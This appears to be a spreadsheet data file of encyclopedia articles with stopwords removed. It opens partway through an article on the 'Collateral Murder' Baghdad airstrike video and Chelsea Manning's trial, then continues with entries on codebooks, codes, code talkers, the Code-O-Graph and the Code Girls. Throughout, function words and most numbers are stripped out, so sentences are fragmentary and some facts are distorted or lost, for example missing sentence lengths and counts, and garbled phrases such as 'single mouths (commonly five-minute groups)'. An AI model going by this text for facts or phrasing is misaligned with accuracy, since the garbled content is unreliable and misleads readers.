ground troops approaching perfectly capable taking people captive, meanwhile murdering troops arrive. that's violation laws course mainstream media omitted stories context. subsequent mainstream media coverage publicity incident ballooned following release footage. event covered jazeera english reuters, later washington post, york times, christian science monitor, bbc, cnn.assange stated press reported third airstrike, three hellfire missiles fired onto apartment complex, appears longer unedited version videos.in interview april collateral murder video release, david finkel said reuters reporters embedded anyone, working independently. gave view context killings: reuters guys walked hottest spot morning. there running battles. there rpg, grenade fire journalists they heard something, came wanted—from everything i've learned since, side story. finkel reported book good soldiers, including conversations closely matched subsequently leaked video footage. interview, finkel asked seen unedited video whether wikileaks shown him. responded, heard wikileaks yesterday. based account book multiple sources, unclassified". assange said finkel seen video least individual offices washington post copy video least year, prior release wikileaks.the washington post denied copy unedited video prior wikileaks release edited version, finkel (who book leave washington post time) said never made statement sources story, except "sourced unclassified information presence area day". interviews ethan mccord ethan mccord, soldier seen video carrying injured boy, recalled interview marc steiner show arrival scene, "the first thing van". after attending girl's wounds handing medic, mccord ordered take position roof returned find moving hand. grabbed bradley myself". mccord states yelled "pulling security". "the first thing thought children home". later sought help psychological trauma, ridiculed told mental health officer, "there would repercussions".mccord discussed experience battle interview world socialist site april 2010, stating, "what happened isolated incident. stuff like happens daily basis iraq." mccord also recalled ordered "kill every motherfucker street" event attack convoy. describing doubts initial enthusiasm iraq, mccord said didn’t understand people throwing rocks shot we're blown head help people. first real serious doubt, could longer justify iraq serving army, july 2007." interview, mccord reports repercussions seeking mental health help could include labeled "malingerer", crime u.s. military law.mccord requested mental health assistance following experiences july told superior officers "get sand [his] vagina" "suck soldier".when interviewed wired, mccord stated supported wikileaks releasing video, qualifications: "when first released think done best manner could been. they stating people weapons whatsoever, carrying cameras. video, clearly weapons trained eye." mccord added, wikileaks thing, didn't. think good they're putting stuff there. think people really want this, though, war. it's disturbing."james spione made short documentary film airstrikes called incident baghdad, featuring first-person account ethan mccord. nominated documentary short subject 84th academy awards. arrest, convictions sentencing manning 2010, 22-year-old american army intelligence analyst, chelsea manning, arrested telling hacker adrian lamo leaked airstrike video, along video another airstrike around 260,000 diplomatic cables, wikileaks. internet chats manning lamo revealed public wired.wikileaks said unable confirm whether manning source video, stating never collect personal information sources", saying [manning the] whistleblower then, without doubt, [s]he's national hero" taken steps arrange [her] protection legal defence".on february 2013, manning pleaded guilty specified charges. trial remaining charges began june 2013. july manning acquitted serious charge, aiding enemy, giving secrets wikileaks. addition five espionage counts, also found guilty five theft specifications, computer fraud specifications multiple military infractions.on august 2013, manning sentenced years' imprisonment, reduction rank private first class private, forfeiture allowances, dishonorable discharge. pursuant commutation president obama, chelsea manning released 2017. legality attacks june 2010, article yorker, raffi khatchadourian addressed several issues involved determining legality attacks, including "proportionality", "positive identification" ("reasonable certainty" target hostile intent), "the treatment casualties ongoing military operation".mark taylor, international expert director fafo institute international studies norway, told jazeera "there's case made crime committed." added, think video shows really case challenges whether laws strict enough." article gawker stated reuters reporter luke baker written article claiming airstrikes crimes, reuters refused story. reuters responded, absolutely untrue story spiked. sent back reporting effort incorporate wider range experts. story overtaken updated washington incorporated reporting original piece." military legal review april 2010, release video footage wikileaks, united states central command, oversees wars iraq afghanistan, released collection documents including investigative reports. pentagon officials told reuters news agency u.s. military lawyers reviewing video could reopen investigation incident, spokesperson later said plans reopen investigation.the report states least members group first fired armed, rpgs ak-47 rifle could seen helicopter video, weapons picked follow-up u.s. ground troops. report concludes reuters employees company armed insurgents. also states "the cameras could easily mistaken slung ak-47 rifles, especially since neither cameraman wearing anything identifies media press". report recommends encouraging journalists iraq wear special vests identify themselves, keep u.s. military updated whereabouts. claimed reporters' "furtive attempts photograph coalition ground forces made appear hostile combatants". incident according report attack personnel u.s. army report account according u.s. army investigation report released united states central command, engagement started 10:20 iraqi local time ended 10:41. unit bravo company 2–16 within meters individuals fired upon ah-64 apache cannons. company charged clearing sector small armed forces, fire small arms rocket-propelled grenades (rpgs). company supported apache helicopters cavalry division's aviation brigade, call signs "crazyhorse 1/8" "crazyhorse 1/9". identified crazyhorse carrying launcher ak-47. when cameraman ground aimed camera direction bravo company 2–16, pilot remarked "he's getting ready fire". apache maneuvered around building clear field fire shot nine men, killing eight. passing stopped attempted load wounded man. after getting permission fire, apache crew fired van. when bravo company arrived scene, reported finding rpgs ak-47 akm. they also found canon digital cameras telephoto lenses. children found van, four-year-old girl gunshot wounds embedded windscreen glass wounds eight-year-old multiple wounds, including brain damage arising shrapnel damage right temporal lobe. both children said evacuated 28th combat support hospital forward operating base loyalty, transferred iraqi medical facility next day. this account first bringing wounded children combat support hospital appears contradicted orders radio form part video record, forbids orders children handed local police.while weapons team providing support first engagement area informed ground troops receiving small arms fire south/southwest. crew crazyhorse located multiple individuals weapons meters east coalition forces given clearance engage targets. however, co-pilot/gunner observed child non-combatants vicinity individuals decided hold engagement non-combatants clear. after non-combatants clear crazyhorse engaged targets. crew crazyhorse could engage target obfuscation buildings dust.the team observed several individuals group, possibly wounded, large multistory building. co-pilot/gunner crazyhorse spotted three individuals near building drive away west. minutes team diverted attention vehicle. however, according co-pilot crazyhorse failed positively identify occupants combatants returned previous engagement area. attack building u.s. army report account events attack attack building (approximately minutes) captured leaked video footage. military include attack building report. julian assange's comments regarding u.s. army report assange responded investigation report released army interview democracy now!, stating "the tone language trying find excuse activity. it's clear approach, find mechanism excuse behavior, ended happening." awards 2011 barcelona human rights film festival awarded investigative film collateral murder, hellfire, done kristinn hrafnsson, wikileaks spokesperson, ingi ingason, award international journalism human rights.in june 2011 federation german scientists (vdw) awarded "whistleblower award" person made video collateral murder public wikileaks. media representations don't see, 2010 feature-length documentary film directed presented australian journalist john pilger, opens wikileaks footage attack. incident baghdad, 2011 oscar-nominated short documentary film baghdad airstrike. steal secrets: story wikileaks, 2013 feature-length documentary film directed alex gibney, includes wikileaks footage attack. documentary: permission engage archived january 2018, wayback machine: "collateral murder" eyes victims' families. interview ethan mccord representation (including audio) banksy, october 2013. part banksy's better than month-long artwork series streets york city. source, 2014 oratorio hearne, included footage airstrike, well faces people reacting risk, 2016 documentary wikileaks' founder julian assange, included footage discussion. notes references external links collateral murder wikileaks-owned alternate site, includes full footage video originally released collateral murder iraq (39m 13s) (616 mb), pirate wikileaks editor apache combat video: excuse killing civilians april 2010. russia today youtube families victims 2007 helicopter killing react leaked video video report democracy now! ethan mccord describes emotional toll witnessing killings video interview democracy now! 'collateral murder' baghdad anything but, rebuttal bill roggio "julian assange your friend" australian broadcasting corporation videos wikileaks site. archived 2012. archived internet archive.</t>
  </si>
  <si>
    <t>Codress message</t>
  </si>
  <si>
    <t>military cryptography, codress message encrypted message whose address also encrypted. this usually done prevent traffic analysis. references</t>
  </si>
  <si>
    <t>Codebook</t>
  </si>
  <si>
    <t>codebook type document used gathering storing cryptography codes. originally codebooks often literally books, today codebook byword complete record series codes, regardless physical format. cryptography cryptography, codebook document used implementing code. codebook contains lookup table coding decoding; word phrase strings replace decipher messages written code, corresponding copies codebook must available either end. distribution physical security codebooks presents special difficulty codes, compared secret information used ciphers, key, typically much shorter. united states national security agency documents sometimes codebook refer block ciphers; compare combiner-type algorithm refer stream ciphers. codebook come forms, one-part two-part: part codes, plain text words phrases corresponding code words alphabetical order. they organized similar standard dictionary. such codes half size two-part codes vulnerable since attacker recovers code word meanings often infer meaning nearby code words. part codes used simply shorten messages transmission security enhanced superencryption methods, adding secret number numeric code words. part codes, part converting plaintext ciphertext, opposite purpose. they usually organized similar language translation dictionary, plaintext words first part) ciphertext words second part) presented like dictionary headwords.the earliest known codebook system gabriele lavinde 1379 working antipope clement vii.two-part codebooks back least antoine rossignol 1800s.from 15th century middle 19th century, nomenclators (named nomenclator) used cryptographic method.codebook superencryption used cryptographic method world i.the jn-25 code used world used code book 30,000 code groups superencrypted 30,000 random additives. book used book cipher book used running cipher book shared sender receiver different cryptographic codebook. social sciences social sciences, codebook document containing list codes used data refer variables values, example locations, occupations, clinical diagnoses. data compression codebooks also used 19th- 20th-century commercial codes non-cryptographic purpose data compression. codebooks used relation precoding beamforming mobile networks lte. usage standardized 3gpp, example document 38.331, radio resource control (rrc); protocol specification. also block cipher modes operation code book references</t>
  </si>
  <si>
    <t>Code</t>
  </si>
  <si>
    <t>communications information processing, code system rules convert information—such letter, word, sound, image, gesture—into another form, sometimes shortened secret, communication communication channel storage storage medium. early example invention language, enabled person, speech, communicate thought, saw, heard, felt others. speech limits range communication distance voice carry limits audience present speech uttered. invention writing, converted spoken language visual symbols, extended range communication across space time. process encoding converts information source symbols communication storage. decoding reverse process, converting code symbols back form recipient understands, english or/and spanish. reason coding enable communication places ordinary plain language, spoken written, difficult impossible. example, semaphore, configuration flags held signaler arms semaphore tower encodes parts message, typically individual letters, numbers. another person standing great distance away interpret flags reproduce words sent. theory information theory computer science, code usually considered algorithm uniquely represents symbols source alphabet, encoded strings, target alphabet. extension code representing sequences symbols source alphabet obtained concatenating encoded strings. before giving mathematically precise definition, brief example. mapping {\displaystyle c=\{\,a\mapsto 0,b\mapsto 01,c\mapsto 011\,\}} code, whose source alphabet {\displaystyle \{a,b,c\}} whose target alphabet {\displaystyle \{0,1\}} using extension code, encoded string 0011001 grouped codewords turn decoded sequence source symbols acab. using terms formal language theory, precise mathematical definition concept follows: finite sets, called source target alphabets, respectively. code {\displaystyle c:\,s\to t^{*}} total function mapping symbol sequence symbols extension {\displaystyle {\displaystyle homomorphism {\displaystyle s^{*}} {\displaystyle t^{*}} naturally maps sequence source symbols sequence target symbols. variable-length codes section, consider codes encode source (clear text) character code word dictionary, concatenation code words give encoded string. variable-length codes especially useful clear text characters different probabilities; also entropy encoding. prefix code code "prefix property": valid code word system prefix (start) valid code word set. huffman coding known algorithm deriving prefix codes. prefix codes widely referred "huffman codes" even code produced huffman algorithm. other examples prefix codes country calling codes, country publisher parts isbns, secondary synchronization codes used umts wcdma wireless standard. kraft's inequality characterizes sets codeword lengths possible prefix code. virtually uniquely decodable one-to-many code, necessarily prefix one, must satisfy kraft's inequality. error-correcting codes codes also used represent data resistant errors transmission storage. this so-called error-correcting code works including carefully crafted redundancy stored transmitted) data. examples include hamming codes, reed–solomon, reed–muller, walsh–hadamard, bose–chaudhuri–hochquenghem, turbo, golay, goppa, low-density parity-check codes, space–time codes. error detecting codes optimised detect burst errors, random errors. examples codes communication used brevity cable code replaces words (e.g. ship invoice) shorter words, allowing information sent fewer characters, quickly, less expensively. codes used brevity. when telegraph messages state rapid long-distance communication, elaborate systems commercial codes encoded complete phrases single mouths (commonly five-minute groups) developed, telegraphers became conversant "words" byoxo ("are trying weasel deal?"), liouy ("why answer question?"), bmuld ("you're skunk!"), ayylu ("not clearly coded, repeat clearly."). code words chosen various reasons: length, pronounceability, etc. meanings chosen perceived needs: commercial negotiations, military terms military codes, diplomatic terms diplomatic codes, preceding espionage codes. codebooks codebook publishers proliferated, including front american black chamber herbert yardley first second world wars. purpose codes save cable costs. data coding data compression predates computer era; early example telegraph morse code more-frequently used characters shorter representations. techniques huffman coding used computer-based algorithms compress large data files compact form storage transmission. character encodings character encodings representations textual data. given character encoding associated specific character (the collection characters represent), though character sets multiple character encodings vice versa. character encodings broadly grouped according number bytes required represent single character: single-byte encodings, multibyte (also called wide) encodings, variable-width (also called variable-length) encodings. earliest character encodings single-byte, best-known example ascii. ascii remains today, example http headers. however, single-byte encodings cannot model character sets characters. scripts require large character sets chinese, japanese korean must represented multibyte encodings. early multibyte encodings fixed-length, meaning although character represented byte, characters used number bytes ("word length"), making suitable decoding lookup table. final group, variable-width encodings, subset multibyte encodings. these complex encoding decoding logic efficiently represent large character sets keeping representations commonly used characters shorter maintaining backward compatibility properties. this group includes utf-8, encoding unicode character set; utf-8 common encoding text media internet. genetic code biological organisms contain genetic material used control function development. this dna, contains units named genes messenger derived. this turn produces proteins genetic code series triplets (codons) four possible nucleotides translated twenty possible amino acids. sequence codons results corresponding sequence amino acids form protein molecule; type codon called stop codon signals sequence. gödel code mathematics, gödel code basis proof gödel's incompleteness theorem. here, idea mathematical notation natural number (using gödel numbering). other there codes using colors, like traffic lights, color code employed mark nominal value electrical resistors trashcans devoted specific types garbage (paper, glass, organic, etc.). marketing, coupon codes used financial discount rebate purchasing product (usual internet) retailer. military environments, specific sounds cornet used different uses: mark moments day, command infantry battlefield, etc. communication systems sensory impairments, sign language deaf people braille blind people, based movement tactile codes. musical scores common encode music. specific games code systems record matches, e.g. chess notation. cryptography history cryptography, codes common ensuring confidentiality communications, although ciphers used instead. secret codes intended obscure real messages, ranging serious (mainly espionage military, diplomacy, business, etc.) trivial (romance, games) kind imaginative encoding: flowers, game cards, clothes, fans, hats, melodies, birds, etc., sole requirement pre-agreement meaning sender receiver. other examples other examples encoding include: encoding cognition) basic perceptual process interpreting incoming stimuli; technically speaking, complex, multi-stage process converting relatively objective sensory input (e.g., light, sound) subjectively meaningful experience. content format specific encoding format converting specific type data information. text encoding uses markup language structure features text facilitate processing computers. (see also text encoding initiative.) semantics encoding formal language informal language method representing terms (e.g. programs descriptions) language using language data compression transforms signal code optimized transmission storage, generally done codec. neural encoding information represented neurons. memory encoding process converting sensations memories. television encoding: ntsc, secamother examples decoding include: decoding (computer science) decoding methods, methods communication theory decoding codewords sent noisy channel digital signal processing, study signals digital representation processing methods signals digital-to-analog converter, analog circuit decoding operations word decoding, phonics decipher print patterns translate sounds language codes acronyms acronyms abbreviations considered codes, sense, languages writing systems codes human thought. international transport association airport codes three-letter codes used designate airports used tags. station codes similarly used railways usually national, code used different stations different countries. occasionally, code word achieves independent existence (and meaning) original equivalent phrase forgotten least longer precise meaning attributed code word. example, '30' widely used journalism mean "end story", used contexts signify "the end". also asemic writing cipher code (semiotics) equipment codes quantum error correction semiotics universal language references chevance, fabienne (2017). "case genetic code triplet triplets". proceedings national academy sciences united states america. (18): 4745–4750. doi:10.1073/pnas.1614896114. 5422812. pmid 28416671. further reading codes abbreviations international telecommunication services (2nd ed.). geneva, switzerland: international telecommunication union. 1963. oclc 13677884.</t>
  </si>
  <si>
    <t>Code-talker paradox</t>
  </si>
  <si>
    <t>code-talker paradox situation language prevents communication. issue linguistics, paradox raises questions fundamental nature languages. such, paradox problem philosophy language. term code-talker paradox coined 2001 mark baker describe navajo code talking used world code talkers able create language mutually intelligible completely unintelligible everyone know code. this causes conflict interests without actually causing conflict all. case navajo code-talkers, cryptanalysts unable decode messages navajo, even using sophisticated methods available. time, code talkers able encrypt decrypt messages quickly easily translating navajo. thus code talker paradox refers human languages similar different once: similar learn gain ability translate other, different someone knows language know another, always possible derive meaning text analyzing infer language. baker solves paradox theory universal grammar. within universal grammar, certain parameters shared languages. languages differ another given parameter different settings across languages. number possible combinations parameter settings accounts diversity human languages, fact every human brain wired process parameters means learn language, brain simply adapts already knows. brain recognizes parameters first language exposed processes different language, simply changes values corresponding parameters. hence human languages vary greatly other, human theoretical capacity learn, converse translate from, human language. also drift (linguistics) list paradoxes plato's problem analysis verbal behavior philip johnston references baker, mark atoms language: mind's hidden rules grammar. basic books, 2001.</t>
  </si>
  <si>
    <t>Code-O-Graph</t>
  </si>
  <si>
    <t>code-o-graph field cipher device identifier captain midnight radio serial. story line used agents secret squadron, paramilitary organization headed captain midnight. addition devices radio program, offered radio premiums listeners. radio premiums, listeners sent ovaltine proof purchase names addresses. code-o-graph incorporates cipher disk, cryptological device, letters message substituted numbers, probably avoid ambiguity broadcast messages. radio show, usually week, message would sent could deciphered listeners. each message, words long, invariably clue upcoming episode. models first code-o-graph, called "mystery dial" unit, introduced 1941, device enable secret squadron agents field send receive secure messages. badge form, next three models. front badge displayed number cipher alphabet scales. reverse windows, labeled "master code"; other, "super code." window used cipher settings. example, cipher designated "master code meant movable rotor spun number would appear window labeled "master code." this setting would align number cipher alphabet scales correctly decipher message. second code-o-graph "photo-matic" unit. badge space picture owner, make photo-id badge. advent world affected code-o-graph availability: previous models made brass, attack pearl harbor, propelled united states world caused u.s. government impose restrictions manufacturing materials. copper brass considered critical materials, materials diverted activities. this precluded brass used manufacture novelties like radio premiums. photo-matic code-o-graph, although distributed 1942, manufactured prior pearl harbor attack. since predecessor, undated, newer code-o-graph used 1943 1944 seasons well 1942, making code-o-graph longest service life. cipher setting scheme similar 1941 mystery dial model, cipher setting window, labeled "master code." late 1944, ovaltine scraped together enough material manufacture another code-o-graph, 1945 "magni-magic" code-o-graph. this unit used stamped sheet steel badge bodies, painted "gold" paint look similar earlier brass badges. cipher disk element made injection-molded plastic, center disk knob form magnifying lens. production limited, model supplies completely exhausted. 1945 model altered cipher-key setting scheme. method align letters alphabet scale numeral number scale. instance, "master code x-15" setting meant letter would moved next number number scale. advantage scheme total possible setting combinations could used. disadvantage compromised letter-number pair. 1946 model "mirro-flash" unit, first postwar code-o-graph, last badge form. since ended, badge made stamped sheet brass, plastic "dial" element small circular mirror signaling heliography. used cipher-key setting methodology immediate predecessor. this practice used 1947 1949 models well. 1947 model first non-badge form. shape police-style whistle, cipher elements along side. called "whistle code-o-graph," possibly least imaginative name series. 1948 model, "mirro-magic" unit, circular product, manufactured brass, aluminum, plastic, steel. cipher letters numbers could seen time windows front. design cipher alphabet number disks coupled friction, often slippage trying decipher message. unlike code-o-graph, cipher-key settings utilized pointer back, number scale each would increment positioning scales. last code-o-graph "key-o-matic" unit. possibly compensate slippage 1948 unit's elements, cipher alphabet number scales placed interlocking gears, preventing slippage. resetting cipher elements utilized small inserted slots gears, could disengaged, using leaf spring simple clutch mechanism. references popular culture code-o-graph-like secret decoder ring featured 1983 movie christmas story object frustration. richard farina been down long looks like (1966) talks chapter one, listing first list "only possessions necessities life." 1983 penguin edition) references tomart's price guide radio premium cereal collectibles tumbusch (radnor, wallace-homestead, 1991 isbn 0-87069-635-1)</t>
  </si>
  <si>
    <t>Code word</t>
  </si>
  <si>
    <t>communication, code word element standardized code protocol. each code word assembled accordance specific rules code assigned unique meaning. code words typically used reasons reliability, clarity, brevity, secrecy. also code word (figure speech) coded commercial code (communications) compartmentalization (information security) duress code error correction detection marine radio password safeword spelling alphabet references this article incorporates public domain material general services administration document: "federal standard 1037c". support mil-std-188) this article incorporates public domain material united states department defense document: "dictionary military associated terms". unhcr procedure radio communication external links unhcr procedure radio communication</t>
  </si>
  <si>
    <t>Code talker</t>
  </si>
  <si>
    <t>code talker person employed military wartime little-known language means secret communication. term usually associated united states service members world wars used knowledge native american languages basis transmit coded messages. particular, approximately native americans united states marine corps whose primary transmit secret tactical messages. code talkers transmitted messages military telephone radio communications nets using formally informally developed codes built upon native languages. code talkers improved speed encryption decryption communications front line operations world there code types used world type codes formally developed based languages comanche, hopi, meskwaki, navajo peoples. they used words languages letter english alphabet. messages could encoded decoded using simple substitution cipher ciphertext native language word. type code informal directly translated english native language. word native language describe military word, code talkers used descriptive words. example, navajo word submarine, translated iron fish.the name code talkers strongly associated bilingual navajo speakers specially recruited world marine corps serve standard communications units pacific theater. code talking pioneered cherokee choctaw peoples world other native american code talkers deployed united states army world including lakota, meskwaki, mohawk, comanche, tlingit, hopi, cree, crow soldiers; served pacific, north african, european theaters. languages assiniboine native speakers assiniboine language served code talkers world encrypt communications. code talkers gilbert horn sr., grew fort belknap indian reservation montana became tribal judge politician. basque november 1952, euzko deya magazine reported year, upon meeting large number marines basque ancestry francisco camp, captain frank carranza thought using basque language codes. superiors concerned risk, known settlements basque people pacific region, including: basque jesuits hiroshima, pedro arrupe; colony basque alai players china philippines; basque supporters falange asia. consequently, basque code talkers deployed theaters, instead used initially tests transmitting logistics information hawaii australia. according euzko deya, august 1942, lieutenants nemesio aguirre, fernández bakaicoa, juanana received basque-coded message diego admiral chester nimitz. message warned nimitz operation apple remove japanese solomon islands. they also translated start date, august attack guadalcanal. extended pacific, shortage basque speakers, military came prefer parallel program based navajo speakers. 2017, pedro oiarzabal guillermo tabernilla published paper refuting euzko deya's article. according oiarzabal tabernilla, could find carranza, aguirre, fernández bakaicoa, juanana national archives records administration army archives. they find small number marines basque surnames, none worked transmissions. they suggest carranza's story office strategic services operation raise sympathy intelligence among basque nationalists. cherokee first known code talkers military world cherokee soldiers 30th infantry division fluent cherokee language assigned transmit messages fire second battle somme. according division signal officer, took place september 1918 unit british command. choctaw during world company commander captain lawrence army overheard solomon louis mitchell bobb conversation choctaw. upon investigation, found eight choctaw served battalion. choctaw army's 36th infantry division trained language code helped american expeditionary forces several battles meuse-argonne offensive. october 1918, code talkers pressed service "tide battle turned within hours within hours allies full attack." comanche german authorities knew code talkers world joseph goebbels declared native americans fellow aryans. addition, germans sent team thirty anthropologists united states learn native american languages outbreak world however, task proved difficult large array native languages dialects. nonetheless, learning nazi effort, army opted implement large-scale code talker program european theater. initially, code talkers enlisted three unable make trip across atlantic unit finally deployed. total code talkers using comanche language took part invasion normandy served infantry division europe. comanche soldiers signal company compiled vocabulary code terms using words phrases language. using substitution method similar navajo, code talkers used descriptive words comanche language things translations. example, comanche language code term tank turtle, bomber pregnant bird, machine sewing machine, adolf hitler crazy white man.two comanche code talkers assigned regiment, remainder assigned infantry division headquarters. shortly landing utah beach june 1944, comanche began transmitting messages. some wounded none killed.in 1989, french government awarded comanche code talkers chevalier national order merit. november 1999, united states department defense presented charles chibitty knowlton award, recognition outstanding intelligence work. cree world canadian armed forces employed first nations soldiers spoke cree language code talkers. owing oaths secrecy official classification 1963, role cree code talkers less well-known counterparts went unacknowledged canadian government. 2016 documentary, cree code talkers, tells story métis individual, charles "checker" tomkins. tomkins died 2003, interviewed shortly death smithsonian national museum american indian. while identified cree code talkers, "tomkins last comrades know anything secret operation." hungarian 2022 russo-ukrainian war, hungarian language reported used ukrainian army relay operational military information orders circumvent understood invading russian army without need encrypt decipher messages. ukraine sizeable hungarian population thousand people, live mainly kárpátalja hungarian) zakarpatska oblast ukrainian) division ukraine, adjacent hungary. ukrainian nationals, enlistment also subject military service, hence ukrainian army hungarian-speaking capability. hungarian language spoken official languages region present-day ukraine. hungarian language non-indo-european language unlike slavic ukrainian russian, ugric language. reason distinct incomprehensible russian speakers. meskwaki group meskwaki enlisted army together january 1941; comprised percent iowa's meskwaki population. during world army trained eight meskwaki native language code talkers. they assigned north africa. eight posthumously awarded congressional gold medal 2013; government gave awards representatives meskwaki community. mohawk mohawk language code talkers used world united states army pacific theater. levi oakes, mohawk code talker born canada, deployed protect messages sent allied forces using kanien'kéha, mohawk sub-set language. oakes died 2019; last mohawk code talkers. muscogee (seminole creek) muscogee language used type code (informal) world enlisted seminole creek people army. tony palmer, leslie richard, edmund harjo, thomas macintosh seminole nation oklahoma muscogee (creek) nation recognized code talkers recognition 2008. last survivor code talkers, edmond harjo seminole nation oklahoma, died march 2014, biography recounted congressional gold medal ceremony honoring harjo code talkers capitol november 2013. navajo philip johnston, civil engineer city angeles, proposed navajo language united states marine corps beginning world johnston, world veteran, raised navajo reservation missionaries navajo. among non-navajo spoke language fluently. many navajo enlisted shortly attack pearl harbor eagerly contributed effort. because navajo complex grammar, mutually intelligible even closest relatives within na-dene family provide meaningful information. time, still unwritten language, johnston believed navajo could satisfy military requirement undecipherable code. complex syntax phonology, mention numerous dialects, made unintelligible anyone without extensive exposure training. estimate indicates outbreak world fewer non-navajo could understand language.in early 1942, johnston commanding general amphibious corps, major general clayton vogel, staff. johnston staged simulated combat conditions demonstrated navajo could transmit decode three-line message seconds, compared minutes took machines time. idea using navajo speakers code talkers accepted; vogel recommended marines recruit navajo. first navajo recruits attended boot camp 1942. this first group created navajo code camp pendleton.the navajo code formally developed modeled joint army/navy phonetic alphabet uses agreed-upon english words represent letters. since determined phonetically spelling military terms letter letter words combat would time-consuming, terms, concepts, tactics, instruments modern warfare given uniquely formal descriptive nomenclatures navajo. example, word shark referred destroyer, silver leaf indicated rank lieutenant colonel.a codebook developed teach many relevant words concepts initiates. text classroom purposes never taken field. code talkers memorized variations practiced rapid stressful conditions training. navajo speakers trained code work would idea code talkers' messages meant; would hear truncated disjointed strings individual, unrelated nouns verbs. navajo code talkers commended skill, speed, accuracy demonstrated throughout war. battle jima, major howard connor, marine division signal officer, navajo code talkers working around clock first days battle. these sent received messages, without error. connor later said, "were navajos, marines would never taken jima."after incidents navajo code talkers mistaken ethnic japanese captured american soldiers, several assigned personal bodyguard whose principal duty protect side. according bill toledo, second group original secret secondary duty: charge risk captured, shoot protect code. fortunately, none ever called upon so.to ensure consistent code terminologies throughout pacific theater, representative code talkers marine divisions hawaii discuss shortcomings code, incorporate terms system, update codebooks. these representatives, turn, trained code talkers could attend meeting. progressed, additional code words added incorporated program-wide. instances, informal shortcut code words devised particular campaign disseminated beyond area operation. examples code words include navajo word buzzard, jeeshóóʼ, used bomber, code word used submarine, béésh łóóʼ, meant iron fish navajo. last original navajo code talkers developed code, chester nez, died june 2014.four last nine navajo code talkers used military died 2019: alfred newman died january 2019, 2019, fleming begaye died mexico state senator john pinto, elected 1977, died office 2019. william tully brown died june 2019 aged vandever died january 2020. samuel sandoval died july 2022, deployment navajo code talkers continued korean after, ended early vietnam war. navajo code spoken military code never deciphered. nubian 1973 arab–israeli war, egypt employed nubian-speaking nubian people code talkers. tlingit during world two, american soldiers used native tlingit code japanese forces. their actions remained unknown, even declassification code talkers publication navajo code talkers. memory five deceased tlingit code talkers honored alaska legislature march 2019. welsh system employing welsh language used british forces world great extent. 1942, royal force developed plan welsh secret communications, never implemented. welsh used recently yugoslav wars non-vital messages. wenzhounese china used wenzhounese-speaking people code talkers 1979 sino-vietnamese war. post-war recognition navajo code talkers received recognition 1968 operation declassified. 1982, code talkers given certificate recognition president ronald reagan, also named august 1982 navajo code talkers day.on december 2000, president bill clinton signed public 106-554, statute 2763, awarded congressional gold medal original world navajo code talkers silver medals person qualified navajo code talker (approximately 300). july 2001, president george bush honored code talkers presenting medals four surviving original code talkers (the fifth living original code talker unable attend) ceremony held capitol rotunda washington, gold medals presented families deceased original code talkers.journalist patty talahongva directed produced documentary, power words: native languages weapons war, smithsonian national museum american indian 2006, bringing light story hopi code talkers. 2011, arizona established april annual recognition hopi code talkers. texas medal valor awarded posthumously choctaw code talkers world service september 2007, adjutant general state texas.the code talkers recognition 2008 (public 110-420) signed president george bush november 2008. recognized every native american code talker served united states military wwii (with exception already-awarded navajo) congressional gold medal. designed distinct tribe, silver duplicates awarded individual code talkers next-of-kin. 2013, tribes identified honored ceremony emancipation hall capitol visitor center. surviving code talker present, edmond harjo.on november 2017, three navajo code talkers, joined president navajo nation, russell begaye, appeared president donald trump oval office official white house ceremony. they "pay tribute contributions young native americans recruited united states military create top-secret coded messages used communicate world battles." executive director national congress american indians, jacqueline pata, noted native americans high level participation military veterans' service." statement navajo nation council delegate comments pata begaye, among others, objected trump's remarks event, including "once [of] word pocahontas negative towards political adversary elizabeth warren claims 'native american heritage'." national congress american indians objected trump's name pocahontas, historical native american figure, derogatory term. also native americans world united states army indian scouts windtalkers, 2002 american film navajo radio operators world references further reading aaseng, nathan. navajo code talkers: america's secret weapon world york: walker company, 1992. isbn 0802776272 oclc 672012184 connole, joseph. nation whose language will understand: comanche code talkers wwii". whispering wind magazine, march, 2012, vol. issue #279. 21–26 durrett, deanne. unsung heroes world story navajo code talkers. library american indian history, facts file, inc., 1998. isbn 0816036039 oclc 38067688 gawne, jonathan. spearheading d-day. paris: histoire collections, 1999. isbn 2908182793 oclc 45700217 holm, tom. code talkers warriors native americans world york: infobase publishing, 2007. isbn 0791093409 kahn, david. codebreakers: story secret writing. 1967. isbn 0684831309 mcclain, salley. navajo weapon: navajo code talkers. tucson, arizona: nuevo publishers, 2001. isbn 1887896325 oclc 48584920 meadows, william comanche code talkers world austin: university texas press, 2002. isbn 0292798504 oclc 55896749 singh, simon, code book: science secrecy ancient egypt quantum cryptography. 2000. isbn 978-0385495325 external links united states. code talkers recognition 2008 national museum american indian exhibition code talkers, entitled native words/native wisdom northern arizona university cline library special collections code talkers exhibition encyclopedia oklahoma history culture code talkers official website navajo code talkers</t>
  </si>
  <si>
    <t>Code Girls</t>
  </si>
  <si>
    <t>code girls world code girls group 10,000 women served cryptographers (code makers) cryptanalysts (code breakers) united states military world recruitment months prior japanese attack pearl harbor, united states navy began recruit women college students work cryptographers cryptanalysts. after attack, recruitment activities increased united states' joined allied forces fight axis powers world ii.during recruitment process, women asked liked crossword puzzles engaged married. those answered 'yes' 'no', respectively, moved forward hiring process. candidates invited secret meetings offered opportunity take code-breaking training course sworn secrecy. those passed course invited washington, d.c. college graduation join navy civilian employees.the army also began recruiting women code breakers around time. army officials representatives women's colleges mayflower hotel hopes recruiting students navy able code-breaking first recruits reported navy headquarters washington, d.c. quickly became crowded. 1943, navy expanded operations commandeering original location mount vernon college women naval communications annex.the army also quickly outgrew washington, d.c. office added second location arlington hall junior college women. 1945, percent army's code-breaking team female.among duties, women operated code-breaking machines, analyzed broke enemy codes, built libraries resources enemy operations, intercepted radio signals, tested security american codes.during month 1944, code breakers intercepted 30,000 japanese navy water-transport messages sinking nearly japanese supply ships heading philippines south pacific. prior d-day, shared false information radio messages intentionally mislead germans allied forces' landing location.when asked publicly highly sensitive work, women told reply 'sharpened pencils emptied wastebaskets'. reportedly, cover story never challenged. notable women cryptologists notable women contributed u.s. cryptologic effort world include: virginia dare aderholdt decrypted japanese surrender message caracristi later became deputy director national security agency, highest civilian leadership position margaret crosby worked cryptographer oss' greek desk agnes meyer driscoll broke japanese cipher machine genevieve grotjan feinstein found crucial break japanese purple cipher elizebeth smith friedman helped convict runners prohibition thwarted nazi agents south america helen nibouar helped develop sigaba cipher machine references further reading mundy, liza (2017). code girls: untold story american women code breakers world york. isbn 978-0-316-35253-6 world code girls: what’s name? national archives external links interview, navy cryptographer frances lynd scott collection, (afc/2001/001/48208), veterans history project, american folklife center, library congress interview, army cryptographer jean perdue brownlee collection, (afc/2001/001/09220), veterans history project, american folklife center, library congress "code girls" reunion, library congress</t>
  </si>
  <si>
